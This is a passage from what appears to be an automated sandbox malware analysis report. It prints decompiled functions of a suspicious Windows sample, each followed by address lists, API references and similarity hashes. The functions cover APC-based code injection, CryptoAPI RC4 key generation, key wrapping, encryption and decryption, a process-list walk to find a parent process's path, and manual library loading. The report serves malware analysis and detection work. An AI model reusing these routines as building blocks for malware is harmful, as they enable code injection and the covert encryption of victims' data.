						E00401EBB(_t149); // executed
						_v276 =  &_v76;
						 *_t158 = _v40; // executed
						E00401EBB(_t149); // executed
						_v272 = 0x18;
						_v276 = 0;
						 *_t158 = 0x422020;
						memset(??, ??, ??);
						 *0x422020 = 0;
						 *0x422024 = 1;
						 *0x422028 = _v76;
						_v44 = _v80;
						_v264 = 0;
						_v268 = 0;
						_v272 = 0x422020;
						_v276 = _v44;
						 *_t158 = 0xfffffffe; // executed
						NtQueueApcThread(??, ??, ??, ??, ??); // executed
						L00404F84();
						UpdateWindow(_v32);
						_t160 = _t158 - 0x10;
						while(1) {
							_v288 = 0;
							_v292 = 0;
							_v296 = 0;
							 *_t160 =  &_v72;
							_v188 = 1;
							_t131 = GetMessageA(??, ??, ??, ??);
							_t161 = _t160 - 0x10;
							if((_t131 & 0xffffff00 | GetMessageA > 0x00000000) == 0) {
								break;
							}
							 *_t161 =  &_v72;
							_v188 = 1;
							TranslateMessage(??);
							_t162 = _t161 - 4;
							 *_t162 =  &_v72;
							DispatchMessageA(??);
							_t160 = _t162 - 4;
						}
						_t139 = _v64;
					} else {
						MessageBoxA(0, "Window Creation Failed!", "Error!", 0x1030);
						_t161 = _t157 - 0x10;
						_t139 = 0;
					}
				} else {
					MessageBoxA(0, "Window Registration Failed!", "Error!", 0x1030);
					_t161 = _t156 - 0x10;
					_t139 = 0;
				}
				_v196 = _t139;
				 *_t161 =  &_v192;
				E0040E320(_t149, _t150);
				return _v196;
			}

0x0040207b
0x00402081
0x0040208b
0x00402095
0x0040209b
0x0040209e
0x004020a0
0x004020a5
0x004020a8
0x004020b4
0x004020b9
0x004020c0
0x004020c7
0x004020ce
0x004020d5
0x004020df
0x004020e2
0x004020ea
0x004020f6
0x00402105
0x00402121
0x00402124
0x0040212b
0x00402132
0x0040214c
0x00402151
0x0040215f
0x00402161
0x0040216c
0x004021a1
0x004021ac
0x004021b0
0x004021b8
0x004021c0
0x004021c8
0x004021d0
0x004021d8
0x004021e0
0x004021e8
0x004021f0
0x004021f8
0x00402204
0x0040220e
0x00402210
0x00402213
0x0040221a
0x0040224f
0x0040225a
0x00402262
0x0040226c
0x0040226e
0x00402271
0x00402278
0x0040227f
0x00402286
0x00402299
0x0040229b
0x004022a7
0x004022a7
0x004022a9
0x004022b3
0x004022bd
0x004022c7
0x004022d1
0x004022db
0x004022e5
0x004022f2
0x004022f9
0x004022fc
0x00402306
0x0040230e
0x00402315
0x00402318
0x0040231d
0x00402325
0x0040232d
0x00402334
0x00402339
0x00402343
0x00402350
0x00402358
0x0040235b
0x00402363
0x0040236b
0x00402376
0x0040237a
0x00402381
0x00402389
0x00402399
0x0040239b
0x004023ca
0x004023ca
0x004023d2
0x004023da
0x004023e5
0x004023ed
0x004023f7
0x004023f9
0x00402403
0x00000000
0x00000000
0x004023a3
0x004023ab
0x004023b5
0x004023b7
0x004023bd
0x004023c5
0x004023c7
0x004023c7
0x00402405
0x0040221c
0x00402240
0x00402242
0x00402245
0x00402245
0x0040216e
0x00402192
0x00402194
0x00402197
0x00402197
0x00402408
0x00402431
0x00402434
0x00402446

APIs

LoadIconA.USER32 ref: 0040214C
CreateWindowExA.USER32 ref: 0040220E

Strings

MAINMENU, xrefs: 0040212B
File Editor Example Program, xrefs: 004021E8
Error!, xrefs: 00402176, 00402224
Window Creation Failed!, xrefs: 0040222C
0, xrefs: 004020B9
WindowClass, xrefs: 00402132, 004021F0
Window Registration Failed!, xrefs: 0040217E

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CreateIconLoadWindow
String ID: 0$Error!$File Editor Example Program$MAINMENU$Window Creation Failed!$Window Registration Failed!$WindowClass
API String ID: 1237199932-3124372322
Opcode ID: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
Instruction ID: 37ceb777bd878a6ae4fc1e0f4903b58b5a3b227ee6cbc29fc1c83407536e847a
Opcode Fuzzy Hash: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
Instruction Fuzzy Hash: CBA1E6B09053059FDB10EF64D98878EBFF0EB44308F50852DE498AB391D7B99989CF96

Uniqueness

Uniqueness Score: -1.00%

Function 04008800 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 113
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				signed int _v24;
				signed int _v28;
				long* _v32;
				char* _t41;
				int _t42;
				signed int _t43;
				intOrPtr _t46;
				int _t51;
				char* _t71;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L19:
					return _v8;
				} else {
					_v12 = 0;
					_t41 =  *0x4013370; // 0x400c6e4
					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t42 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t71 =  *0x4013370; // 0x400c6e4
							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v28 = 0x80;
						_v20 = 0;
						_v24 = _v28 << 0x00000010 | 0x00000001;
						_t43 = _v24;
						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
						if(_t43 != 0) {
							_t46 = _a4;
							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
							if(_t46 != 0) {
								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
									_v8 = 1;
								} else {
									_v32 = 0;
									if(CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32) != 0) {
										_t51 = _v20;
										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
										_v8 = _t51;
										CryptDestroyKey(_v32);
									}
								}
							}
							CryptDestroyKey(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L19;
				}
			}

0x04008806
0x04008811
0x0400895c
0x04008962
0x04008821
0x04008821
0x04008831
0x0400883b
0x04008843
0x0400884b
0x04008855
0x04008869
0x04008874
0x04008874
0x04008855
0x0400887e
0x04008884
0x0400888b
0x0400889b
0x040088a2
0x040088af
0x040088b7
0x040088c1
0x040088cf
0x040088d7
0x040088dd
0x0400893f
0x040088f1
0x040088f1
0x04008914
0x04008926
0x0400892a
0x04008930
0x04008937
0x04008937
0x0400893d
0x040088dd
0x0400894a
0x0400894a
0x04008956
0x04008956
0x00000000
0x0400887e

APIs

CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
GetLastError.KERNEL32 ref: 04008845
CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
CryptDestroyKey.ADVAPI32(?), ref: 04008937
CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3052018297-947817771
Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04001CA0 Relevance: 21.1, APIs: 14, Instructions: 111
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E04001CA0(CHAR* _a4, intOrPtr _a8) {
				char _v5;
				char _v272;
				long _v284;
				intOrPtr _v300;
				void* _v308;
				void* _v312;
				long _v316;
				long _v320;
				void* _v324;
				char _v328;
				int _v332;
				void* _t44;
				int _t47;
				int _t50;
				void* _t61;

				_v5 = 0;
				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
				_v312 = _t44;
				if(_v312 == 0xffffffff) {
					L18:
					return _v5;
				}
				_v308 = 0x128;
				_t47 = Process32First(_v312,  &_v308); // executed
				if(_t47 == 0) {
					L17:
					CloseHandle(_v312);
					goto L18;
				}
				_v320 = GetCurrentProcessId();
				_v316 = 0;
				while(_v300 != _v320) {
					_t50 = Process32Next(_v312,  &_v308); // executed
					if(_t50 != 0) {
						continue;
					}
					L6:
					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
						while(_v300 != _v316) {
							if(Process32Next(_v312,  &_v308) != 0) {
								continue;
							}
							goto L17;
						}
						if(lstrlenA( &_v272) < _a8) {
							lstrcpyA(_a4,  &_v272);
							_v324 = OpenProcess(0x410, 0, _v316);
							if(_v324 != 0) {
								_v332 = 0;
								_push( &_v332);
								_push(4);
								_push( &_v328);
								_t61 = _v324;
								_push(_t61); // executed
								L0400B1D4(); // executed
								if(_t61 == 0) {
									_push(_a8);
									_push(_a4);
									_push(_v324); // executed
									L0400B1C8(); // executed
								} else {
									_push(_a8);
									_push(_a4);
									_push(_v328);
									_push(_v324);
									L0400B1CE();
								}
								_v5 = 1;
								FindCloseChangeNotification(_v324); // executed
							}
						}
					}
					goto L17;
				}
				_v316 = _v284;
				goto L6;
			}

0x04001ca9
0x04001cb1
0x04001cb6
0x04001cc3
0x04001e51
0x04001e57
0x04001e57
0x04001cc9
0x04001ce1
0x04001ce8
0x04001e44
0x04001e4b
0x00000000
0x04001e4b
0x04001cf4
0x04001cfa
0x04001d04
0x04001d2e
0x04001d35
0x00000000
0x00000000
0x04001d37
0x04001d3e
0x04001d5f
0x04001e3e
0x00000000
0x00000000
0x00000000
0x04001e3e
0x04001d81
0x04001d92
0x04001dac
0x04001db9
0x04001dbb
0x04001dcb
0x04001dcc
0x04001dd4
0x04001dd5
0x04001ddb
0x04001ddc
0x04001de3
0x04001e05
0x04001e09
0x04001e10
0x04001e11
0x04001de5
0x04001de8
0x04001dec
0x04001df3
0x04001dfa
0x04001dfb
0x04001dfb
0x04001e16
0x04001e21
0x04001e21
0x04001db9
0x04001e27
0x00000000
0x04001d3e
0x04001d18
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
GetCurrentProcessId.KERNEL32 ref: 04001CEE
Process32Next.KERNEL32 ref: 04001D2E
Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
Process32Next.KERNEL32 ref: 04001E37
CloseHandle.KERNEL32(000000FF), ref: 04001E4B

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
String ID:
API String ID: 384183238-0
Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04008BB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				int _v8;
				long* _v12;
				int _v16;
				char _v20;
				int _v24;
				char _v28;
				int _v32;
				char* _t36;
				int _t37;
				intOrPtr _t39;
				char* _t41;
				intOrPtr _t43;
				char* _t57;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L17:
					return _v8;
				} else {
					_v12 = 0;
					_t36 =  *0x4013370; // 0x400c6e4
					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t37 == 0) {
						_t37 = GetLastError();
						_v16 = _t37;
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t57 =  *0x4013370; // 0x400c6e4
							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
						}
					}
					if(_v12 != 0) {
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
						if(_t37 != 0) {
							_t39 = _a8;
							__imp__CryptHashData(_v20, _a4, _t39, 0);
							if(_t39 != 0) {
								_v24 = 0;
								_v28 = 4;
								_t41 =  &_v28;
								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
								if(_t41 != 0 && _a16 >= _v24) {
									_v32 = _a16;
									_t43 = _a12;
									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
									if(_t43 != 0) {
										_v8 = _v32;
									}
								}
							}
							__imp__CryptDestroyHash(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L17;
				}
			}

0x04008bb6
0x04008bc1
0x04008ce7
0x04008ced
0x04008be5
0x04008be5
0x04008bf5
0x04008bff
0x04008c07
0x04008c09
0x04008c0f
0x04008c19
0x04008c2d
0x04008c38
0x04008c38
0x04008c19
0x04008c42
0x04008c59
0x04008c61
0x04008c65
0x04008c71
0x04008c79
0x04008c7b
0x04008c82
0x04008c8b
0x04008c99
0x04008ca1
0x04008cae
0x04008cb7
0x04008cc1
0x04008cc9
0x04008cce
0x04008cce
0x04008cc9
0x04008ca1
0x04008cd5
0x04008cd5
0x04008ce1
0x04008ce1
0x00000000
0x04008c42

APIs

CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
GetLastError.KERNEL32 ref: 04008C09
CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 731959895-947817771
Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04008A70 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				long* _v24;
				char* _t35;
				int _t36;
				int _t38;
				char* _t62;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
					L16:
					return _v8;
				} else {
					_v12 = 0;
					_t35 =  *0x4013370; // 0x400c6e4
					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t36 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t62 =  *0x4013370; // 0x400c6e4
							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v20 = 0;
						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
						if(_t38 != 0) {
							_v24 = 0;
							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
								CryptDestroyKey(_v24);
							}
							CryptDestroyKey(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L16;
				}
			}

0x04008a76
0x04008a81
0x04008ba3
0x04008ba9
0x04008ab9
0x04008ab9
0x04008ac9
0x04008ad3
0x04008adb
0x04008ae3
0x04008aed
0x04008b01
0x04008b0c
0x04008b0c
0x04008aed
0x04008b16
0x04008b1c
0x04008b37
0x04008b3f
0x04008b41
0x04008b66
0x04008b80
0x04008b87
0x04008b87
0x04008b91
0x04008b91
0x04008b9d
0x04008b9d
0x00000000
0x04008b16

APIs

CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
GetLastError.KERNEL32 ref: 04008ADD
CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 1555285084-947817771
Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10001030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
GetProcAddress.KERNEL32(00000000), ref: 1000104E

Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D

SetLastError.KERNEL32(000000C1), ref: 10001096

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04004880 Relevance: 18.1, APIs: 12, Instructions: 146encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
String ID:
API String ID: 2727466597-0
Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04008970 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				char* _t27;
				int _t28;
				int _t33;
				char* _t47;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L12:
					return _v8;
				} else {
					_v12 = 0;
					_t27 =  *0x4013370; // 0x400c6e4
					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t28 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t47 =  *0x4013370; // 0x400c6e4
							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v20 = 0;
						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
							_t33 = _v20;
							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8); // executed
							_v8 = _t33;
							CryptDestroyKey(_v20);
						}
						CryptReleaseContext(_v12, 0); // executed
					}
					goto L12;
				}
			}

0x04008976
0x04008981
0x04008a60
0x04008a66
0x040089a5
0x040089a5
0x040089b5
0x040089bf
0x040089c7
0x040089cf
0x040089d9
0x040089ed
0x040089f8
0x040089f8
0x040089d9
0x04008a02
0x04008a04
0x04008a27
0x04008a3d
0x04008a41
0x04008a47
0x04008a4e
0x04008a4e
0x04008a5a
0x04008a5a
0x00000000
0x04008a02

APIs

CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
GetLastError.KERNEL32 ref: 040089C9
CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
